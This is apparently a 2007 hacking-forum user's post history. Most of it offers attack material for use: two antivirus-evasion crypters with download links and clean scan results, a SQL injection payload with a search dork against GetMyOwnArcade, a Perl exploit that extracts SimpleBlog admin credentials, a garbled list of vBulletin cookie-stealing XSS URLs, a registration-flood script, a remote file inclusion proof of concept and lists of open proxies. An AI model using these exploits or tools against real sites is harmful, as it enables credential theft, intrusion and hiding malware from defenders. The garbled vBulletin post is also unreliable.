Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by Ras

  1. averym8.jpg

    hnLab-V3   2007.8.18.0   2007.08.17   -
    AntiVir 7.4.1.62 2007.08.17 -
    Authentium 4.93.8 2007.08.17 -
    Avast 4.7.1029.0 2007.08.17 -
    AVG 7.5.0.484 2007.08.17 -
    BitDefender 7.2 2007.08.17 -
    CAT-QuickHeal 9.00 2007.08.17 -
    ClamAV 0.91 2007.08.18 -
    DrWeb 4.33 2007.08.18 -
    eSafe 7.0.15.0 2007.08.16 -
    eTrust-Vet 31.1.5069 2007.08.18 -
    Ewido 4.0 2007.08.17 -
    FileAdvisor 1 2007.08.18 -
    Fortinet 2.91.0.0 2007.08.18 -
    F-Prot 4.3.2.48 2007.08.17 -
    F-Secure 6.70.13030.0 2007.08.17 -
    Ikarus T3.1.1.12 2007.08.17 -
    Kaspersky 4.0.2.24 2007.08.18 -
    McAfee 5100 2007.08.17 -
    Microsoft 1.2803 2007.08.18 -
    NOD32v2 2469 2007.08.18 -
    Norman 5.80.02 2007.08.17 -
    Panda 9.0.0.4 2007.08.17 -
    Prevx1 V2 2007.08.18 -
    Rising 19.36.50.00 2007.08.18 -
    Sophos 4.20.0 2007.08.12 -
    Sunbelt 2.2.907.0 2007.08.18 -
    Symantec 10 2007.08.18 -
    TheHacker 6.1.8.170 2007.08.17 -
    VBA32 3.12.2.2 2007.08.17 -
    VirusBuster 4.3.26:9 2007.08.17 -
    Webwasher-Gateway 6.0.1 2007.08.17 -

    Download: http://rapidshare.com/files/50116289/aver.rar

  2. ###############################################
    ### GetMyOwnArcade (search.php) ($query) SQL-Injection
    ###############################################
    ### Discovered By: RoXur777
    ### ***August 11th 2007
    ### Google-Dork: "Powered by GetMyOwnArcade"
    ###############################################
    /*
    * $query is not being filtered before getting passed to a query.
    * Therefore, we can inject SQL code into the SQL-Query.
    * Using UNION-SELECT we can obtain member information.
    */
    ###
    ##
    #Straight-Forward:
    #####################
    ### POST
    ### search.php
    ###"query=')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*"
    #####################
    ###
    ##
    #
    If you did not understand the Straight-Forward version of the exploit then read this:
    ###
    #
    1) Use the search function on a GetMyOwnAracde site. (They are not always visible on index.php)
    2) In the search field type:
    #
    #######
    ')/**/union/**/select/**/0,0,0,username,0,0,0,0,0,password,0,0,0,0,0,0,0,0/**/from/**/getmyown_user/*
    #######
    #
    3) Click Enter.
    4) If exploitation was successful you should see usernames and passwords instead of the search results.
    ---
    However if you see:
    #
    #######
    Game search result for \')/**/union/**/.......
    #######
    #
    That means that the exploit failed.
    #

  3. #!/usr/bin/perl

    #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
    # SimpleBlog <= 3.0 [ comments_get.asp ] #
    # ] Remote SQL Injection [ #
    # #
    # [c]ode by TrinTiTTY [at] g00ns.net #
    # Vulnerability by MurderSkillz #
    # #
    # shoutz: murderskillz, z3r0, kat, str0ke, wicked, clorox #
    # ch0wn, a59, sess, bernard, + the rest of g00ns #
    # [irc.g00ns.net] [[url]www.g00ns.net][/url] [ts.g00ns.net] #
    #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

    use LWP::UserAgent;

    $host = @ARGV[0];
    $ua = LWP::UserAgent->new;

    my $inject = 'comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';

    if (@ARGV < 1){&top( );&usage( )}
    elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
    else { &xpl( ) }
    sub xpl( ) {
    &top( );
    print "\n [~] Connecting\n";
    $res = $ua->get("http://$host/$inject");

    $con = $res->content;
    print "\n [~] Checking for admin info\n";
    if ($con =~ /[b]([-_+.\w]{1,15})<\/strong>/gmi)
    {
    print "\n\t [+] Admin user: $1\n";
    }
    if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi)
    {
    print "\n\t [+] Admin password: $2\n";
    print "\n [+] Complete\n";
    }
    else {
    print "\n [-] Unable to retrieve admin info\n";
    exit(0);
    }
    }
    sub top( )
    {
    print q {
    ##################################################################
    # SimpleBlog <= 3.0 [ comments_get.asp ] #
    # ] Remote SQL Injection [ #
    # #
    # [c]ode by TrinTiTTY [at] g00ns.net #
    # Vulnerability by MurderSkillz #
    ##################################################################
    }
    }
    sub usage( )
    {
    print "\n Usage: perl simpleblog3.pl <host>\n";
    print "\n Example: perl simpleblog3.pl www.example.com/path\n\n";
    exit(0);
    }

  4. #Exploit
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    #name:Black Scorpion
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    #web : [url]www.r3d-crew.com[/url] & [url]www.Xp10.cc[/url]
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    #seript: vBulletin V3.6.8ulletin V3.6.8
    {}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}
    #Exploit

    You and Exploit vBulletin V3.6.8ulletin V3.6.8 Of Md5 Has plooksns search XsS To and You member Wath'S [ 0 ] number member ?


    and me [ 0 ] Or You and Number member Of [ 1 ] admin

    titlesonly=0

    LooK You and me Number

    titlesonly=1 Or admin

    {}{}{}{}{}{}{}{}{}{}{}{}{}{ Black Scorpion : [url]www.r3d-crew.com[/url] & [url]www.Xp10.cc[/url] Team-Hackers-Black Scorpion $ Team-Hackers-Xp10 }{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}|


    [url]http://name.com/vBulletin[/url] V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    Or

    [url]http://name.com/vBulletin[/url] V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=1


    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/index.php?s=<script>alert('document.cookie')</script>



    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0


    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0


    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0


    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/search.php?s=294b77df2552784fd76d4f9eac1488c6&do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0



    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0


    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s=294b77df2552784fd76d4f9eac1488c6&do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0


    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s=294b77df2552784fd76d4f9eac1488c6&f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s=294b77df2552784fd76d4f9eac1488c6&f=2"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    [url]http://www.xxx.com/vBulletin[/url] V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0

    {}{}{}{}{}{}{}{}{}{}{}{}{}{ Black Scorpion : [url]www.r3d-crew.com[/url] & [url]www.Xp10.cc[/url] Team-Hackers-Black Scorpion $ Team-Hackers-Xp10 }{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}|


    #dork: vBulletin V3.6.Bulletin V3.6.8

  5. ####################### vBulletin Version 3.5.4 #########################
    Script : vBulletin Version 3.5.4
    site : [url]www.vbulletin.com[/url]
    Exploit by : x-boy
    E-mail : [email]Dicomdk@gmail.com[/email]
    Type : Registration flood in register.php
    Thanks to : Simo64
    #########################################################################
    Code of exploit (For english version , you can change it to other language)=> exploit.php
    cURL Must be activated ([url]http://curl.haxx.se[/url])
    Sorry for my bad English Smile
    #########################################################################
    <?
    set_time_limit(60);
    //You can change 10 to other numbers
    for($i = 1 ; $i <= 10 ; $i++)
    {
    //to put curl to send POST request
    $ch = curl_init();
    //change [url]http://localhost/vb3[/url] to the url of the script
    curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
    curl_setopt($ch , CURLOPT_POST , 1) ;
    curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
    curl_exec($ch);
    curl_close($ch);
    }
    //Flood finished good luck
    ?>
    ##########################################################################

  6. HTTP PROXIES - 11 August 2007

    124.128.61.169:3128
    148.243.136.8:3128
    190.24.142.11:3128
    195.175.37.71:80
    195.175.37.71:8080
    216.114.194.19:6588
    212.17.50.220:8080
    81.219.214.10:8080
    61.156.42.123:6317
    60.190.223.77:808
    161.53.9.39:3128
    82.101.14.27:3128
    81.74.236.38:80
    195.175.37.70:8080
    200.50.66.230:80
    165.228.128.11:80
    168.209.0.11:80
    168.209.0.51:80
    211.239.84.195:80
    211.239.84.202:80
    194.36.10.156:3127
    35.9.27.27:3128
    128.193.33.8:3128
    138.23.204.232:3127
    156.17.10.52:3128
    192.41.135.218:3124
    131.246.191.42:3124
    150.65.32.66:3128
    195.113.161.82:3128
    143.205.172.11:3127
    130.149.49.26:3127
    132.239.17.226:3124
    143.205.172.12:3128
    193.167.187.187:3124
    195.116.60.1:3127
    206.207.248.35:3128
    165.228.132.11:80
    165.228.130.10:3128
    165.228.133.10:3128
    195.175.37.71:8080
    80.58.205.61:80
    165.228.128.11:80
    222.124.11.218:3128
    165.228.131.12:80
    165.228.129.10:3128
    128.39.225.99:80
    58.216.233.166:3128
    165.228.128.10:3128
    66.98.238.8:3128
    165.228.132.10:3128
    165.228.131.10:3128
    131.179.112.70:3128
    198.163.152.230:3127
    192.38.109.143:3124
    130.75.87.83:3124
    192.38.109.144:3127
    130.75.87.84:3124
    202.189.126.86:3128
    132.252.152.193:3124
    141.24.33.161:3124
    163.221.11.71:3124
    163.221.11.72:3124
    133.11.240.57:3124
    198.163.152.229:3124
    131.188.44.100:3128
    195.37.16.101:3128
    129.242.19.196:3128
    129.242.19.197:3124
    192.197.121.2:3128
    195.37.16.97:3128
    220.249.114.134:3128
    165.228.133.10:3128
    203.68.16.3:3128
    165.228.129.10:3128
    165.228.131.10:3128
    211.239.84.196:80
    83.69.242.115:3128
    211.239.84.207:80
    165.228.130.10:3128
    165.228.131.12:80
    189.20.146.158:3128
    66.98.238.8:3128
    201.80.45.26:3128
    165.228.132.11:80
    200.233.153.26:3128
    80.78.144.190:8081
    85.18.242.30:80
    165.228.132.10:3128
    201.34.32.44:3128
    222.221.254.162:3128
    213.206.117.164:80
    203.190.153.18:3128
    190.24.142.11:3128
    209.88.91.211:8080
    61.90.248.250:80
    195.175.37.71:8080
    218.10.64.226:8080
    221.232.159.112:808
    58.216.233.166:3128
    217.24.242.142:8080
    210.74.156.140:3128
    80.253.170.190:3128
    61.8.138.179:8080
    220.232.234.174:80
    200.217.76.146:3128
    202.95.140.21:3128
    201.18.5.54:3128
    202.38.61.118:80
    221.4.218.122:3128
    212.241.168.187:80
    203.131.209.142:8080
    125.46.36.223:808
    212.241.168.186:80
    202.166.170.96:80
    202.166.170.110:80
    165.228.131.12:80
    124.216.151.53:8080
    124.53.202.111:8080
    59.93.221.229:6588
    82.66.245.160:8081
    206.51.229.7:34311
    205.178.191.170:9090
    195.175.37.70:80
    81.57.1.92:8081
    211.138.91.30:8080
    192.76.71.99:80
    124.107.21.116:8080
    212.0.126.202:80
    202.162.80.174:8080
    85.185.16.126:8080
    221.130.55.20:808
    203.160.1.49:554
    59.9.140.219:8080
    203.160.1.38:553
    211.10.167.23:80
    219.240.36.173:4480
    202.177.119.40:8080
    219.248.215.119:8080
    203.160.1.45:554
    84.108.40.63:8000
    68.83.31.203:7212
    201.80.243.85:6588
    217.64.59.190:80
    80.227.118.210:8080
    208.189.232.150:8000
    200.21.244.142:80
    219.8.104.122:8000
    220.130.22.157:80
    68.227.62.172:7212
    220.117.157.16:8080
    195.224.154.232:8080
    218.7.48.22:8080
    202.155.219.88:80
    74.50.4.160:80
    61.152.145.23:80
    195.175.37.71:8080
    200.88.223.99:80
    202.58.183.218:3128
    202.69.136.167:8080
    202.69.192.9:8080
    202.95.140.21:3128
    203.190.153.18:3128
    212.93.201.104:80
    218.108.64.166:80
    220.249.114.134:3128
    60.28.250.235:8080
    80.227.118.210:8080
    85.207.53.230:3128
    87.225.112.247:3128

    SOCKS PROXIES - 11 August 2007

    172.184.74.241:1080
    172.207.110.179:1080
    195.117.171.158:1080
    195.117.61.132:1080
    195.117.61.154:1080
    195.117.61.4:1080
    202.109.121.51:1080
    202.202.79.99:1080
    202.51.183.245:1080
    221.10.53.122:1080
    65.32.80.2:60910
    24.3.36.62:38884
    24.3.6.158:45033
    193.151.76.69:17327
    12.146.143.62:80
    68.198.77.146:40765
    76.98.9.66:8499
    24.190.124.3:44226
    76.181.116.32:29277
    80.34.231.63:14237
    130.225.55.7:1080
    213.245.203.17:12678
    69.137.129.209:4280
    194.79.97.50:1080
    82.224.131.214:12678
    24.24.82.34:18165
    189.3.9.46:12678
    217.6.103.122:1080
    75.12.126.229:8688
    82.2.236.201:12678
    222.82.16.200:1080
    211.55.49.103:27778
    66.176.188.184:7735
    75.109.101.240:8950
    24.154.109.112:1080
    82.134.109.51:12678
    62.121.102.174:12678
    62.216.101.171:17327
    203.199.102.144:1080
    85.84.168.44:17327
    61.144.78.190:1080
    59.77.21.250:1080
    24.76.34.22:17327
    88.203.102.40:17327
    201.245.162.38:1080
    172.141.120.106:9068
    82.242.33.24:12678
    83.165.224.143:12678
    68.39.187.211:3128
    82.245.131.224:17327
    62.57.82.242:12678
    200.72.162.50:1080
    67.81.71.44:17327
    75.14.30.90:4627
    68.196.114.44:2445
    84.237.0.66:8008
    63.218.109.130:1080
    165.132.186.56:27778
    195.145.25.203:1080
    88.156.128.157:12678
    76.179.62.241:9355
    213.60.174.191:12678
    65.28.9.205:53999
    192.115.129.223:12678
    124.125.152.128:1080
    195.10.6.23:1080
    202.47.227.149:1080
    80.35.184.112:14237
    24.116.30.138:14058
    211.30.166.146:8521
    196.203.65.34:8080
    213.60.240.82:12678
    217.14.123.254:17327
    77.51.8.72:1080
    213.220.231.89:14237
    75.6.128.20:8672
    166.82.148.149:6015
    84.108.1.213:25552
    193.219.129.11:1080
    62.121.124.35:12678
    220.166.129.113:3128
    85.137.31.30:12678
    76.22.234.227:4525
    81.172.69.190:4523
    71.229.106.135:25552
    87.105.73.13:29991
    72.178.50.39:51290
    82.246.184.229:17327
    82.241.107.29:14237
    85.84.75.27:17327
    68.45.138.238:1212
    84.125.224.254:12678
    82.14.207.242:1080
    70.173.222.108:13621
    219.91.203.111:1080
    81.202.122.251:17327
    201.253.18.110:1080
    219.240.36.173:4425
    74.69.21.234:41224
    81.172.93.156:12678
    79.13.68.217:9027
    202.147.186.251:1080
    82.34.32.210:18389
    62.43.86.21:17327
    213.60.149.5:17327
    212.62.97.21:8080
    200.127.56.79:12678
    222.45.29.79:1080
    80.32.90.131:12678
    130.225.192.46:10000
    89.156.33.169:17327
    24.249.73.58:80
    195.146.114.114:1080
    172.188.202.44:25511
    222.215.67.54:1080
    84.108.90.110:12678
    200.117.228.47:1080
    82.156.38.159:16325
    24.232.201.21:12678
    201.68.203.226:1080
    84.108.78.42:12678
    83.132.51.60:14237
    58.221.249.34:28837
    217.199.185.9:1080
    24.214.131.252:3388
    68.186.52.197:3093
    195.117.61.1:1080
    75.38.72.219:5582
    65.39.110.110:25552
    69.1.62.134:7793
    217.77.222.200:1080
    209.211.173.6:80
    83.219.137.96:1080
    74.131.19.124:7073
    124.125.11.165:1080
    82.241.180.220:12678
    202.109.121.51:1080
    24.20.152.15:61328
    67.176.147.246:4433
    80.24.247.142:14237
    84.121.204.44:14237
    84.30.148.205:17327
    86.126.92.239:1080
    70.254.23.101:11056
    84.121.208.129:29991
    24.11.187.53:25552
    24.232.82.109:25552
    76.18.33.71:27778
    72.208.59.78:17327
    221.215.129.190:1080
    210.34.23.60:1080
    84.125.242.73:29991
    80.59.23.179:12678
    201.210.226.184:4500
    82.245.85.205:17327
    82.234.55.114:12678
    200.217.233.212:1080
    75.15.85.39:1080
    69.124.81.6:11727
    71.207.222.226:3128
    80.24.225.15:12678
    82.229.73.110:12678
    213.100.121.243:48828
    12.215.77.28:64551
    82.234.61.215:12678
    80.38.63.214:23216
    69.112.161.11:23422
    71.65.74.198:58145
    85.187.158.179:9050
    68.96.11.134:26825
    72.179.166.82:36353
    82.224.98.76:12678
    76.29.115.133:53023
    213.60.20.55:12678
    80.240.195.171:1080
    24.126.41.24:53774
    72.208.106.226:4514
    212.62.106.37:1080
    88.169.220.92:12678
    67.84.251.123:18251
    130.225.192.38:10000
    210.108.75.226:29991
    24.253.72.102:14237
    88.223.24.174:17327
    66.56.93.3:25552
    68.84.243.109:32167
    69.141.232.4:3380
    82.230.82.38:29991
    211.30.100.13:12654
    71.59.220.219:25552
    24.59.218.78:8080
    83.165.59.191:29991
    130.194.13.106:1080
    201.215.127.244:17327
    82.38.161.60:3128
    58.221.249.34:28982
    199.126.160.115:2445
    62.234.38.179:58341
    83.28.100.246:57987
    69.250.241.42:25552
    83.213.112.64:14237
    193.170.2.180:10000
    88.167.88.201:12678
    82.225.54.225:12678
    85.84.187.144:14237
    66.42.220.177:7992
    69.120.84.29:17327
    67.162.30.14:24395
    200.142.190.113:14237
    216.186.243.69:28238
    222.124.11.218:3128
    211.30.214.246:3380
    82.41.141.61:13047
    208.109.16.202:17327
    82.67.83.23:29991
    85.84.8.60:12678
    190.60.52.220:14438
    62.43.79.199:17327
    200.117.220.130:1080
    211.116.254.203:2753
    85.216.249.103:12678
    91.76.1.22:9776
    61.175.243.36:1080
    24.8.100.35:3128
    70.161.222.29:49935
    72.215.21.87:3388
    82.230.236.44:14237
    84.108.78.194:17327
    61.99.67.107:14237
    130.88.60.131:1080
    59.13.158.65:27778
    201.213.56.59:14237
    76.84.230.67:12939
    218.13.181.78:1080
    200.89.70.253:17327
    87.231.188.238:14237
    201.211.43.218:17327
    193.27.41.123:4500
    222.216.108.54:1080
    200.54.64.82:1080
    190.67.12.246:1080
    190.152.2.158:8080

  7. #*/\*##*/\*##*/\*##*/\*##*/\*#
    Web Application: RCMS-Pro
    #*\/*##*\/*##*\/*##*\/*##*\/*#
    Info:
    /////////////////////////////////////////////////////
    Vulnerability: Remote File Inclusion
    Vendor: [url]http://www.rcms-pro.com/[/url]
    Dork: "Powered by RGameScript"
    Found By: Warpboy
    E-Mail/MSNM: [email]Warpboy1@yahoo.com[/email]
    Website: [url]http://private-node.net[/url]
    Shouts: TimQ, Gammarayz, Paradox, z6, PunkerX and everyone else at pnode.
    \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\
    ::PoC::

    [url]http://www.site.com/page.php?id=[/url][shell]

    ******************************************
    ##############################
    [url]http://private-node.net[/url]
    ##############################

  8. peste exact 24 ore si 30 min plec in vacanta... lipsesc vreo 10 zile.

    daca o sa am net in franta intru pe rst :X

    bafta si spor la treaba ;)

    EDIT dupa cateva minute pe mess...

    zbeng: fa

    zbeng: miai copiat ideea

    Ras: stf faa

    zbeng: miai copiat ideea

    zbeng: miai copiat ideea

    zbeng: miai copiat ideea

  9. pussik2.jpg

    Datei 11111111.exe empfangen 2007.07.30 14:21:44 (CET)
    Antivirus Version letzte aktualisierung Ergebnis
    AhnLab-V3 2007.7.28.0 2007.07.30 -
    AntiVir 7.4.0.50 2007.07.30 -
    Authentium 4.93.8 2007.07.27 -
    Avast 4.7.997.0 2007.07.30 -
    AVG 7.5.0.476 2007.07.30 -
    BitDefender 7.2 2007.07.30 -
    CAT-QuickHeal 9.00 2007.07.28 -
    ClamAV 0.91 2007.07.30 -
    DrWeb 4.33 2007.07.30 -
    eSafe 7.0.15.0 2007.07.29 -
    eTrust-Vet 31.1.5016 2007.07.30 -
    Ewido 4.0 2007.07.30 -
    FileAdvisor 1 2007.07.30 -
    Fortinet 2.91.0.0 2007.07.30 -
    F-Prot 4.3.2.48 2007.07.27 -
    F-Secure 6.70.13030.0 2007.07.30 -
    Ikarus T3.1.1.8 2007.07.30 -
    Kaspersky 4.0.2.24 2007.07.30 -
    McAfee 5085 2007.07.27 -
    Microsoft 1.2704 2007.07.30 -
    NOD32v2 2428 2007.07.30 -
    Norman 5.80.02 2007.07.30 -
    Panda 9.0.0.4 2007.07.29 Suspicious file
    Rising 19.34.02.00 2007.07.30 -
    Sophos 4.19.0 2007.07.26 -
    Sunbelt 2.2.907.0 2007.07.28 -
    Symantec 10 2007.07.30 -
    TheHacker 6.1.7.158 2007.07.30 -
    VBA32 3.12.2.1 2007.07.30 -
    VirusBuster 4.3.26:9 2007.07.30 -
    Webwasher-Gateway 6.0.1 2007.07.30 -

    Download: http://rapidshare.com/files/46092692/Pussy_Crypter.rar

    Password: rstzone

    Nu trebuia sa pun poza...

×
×
  • Create New...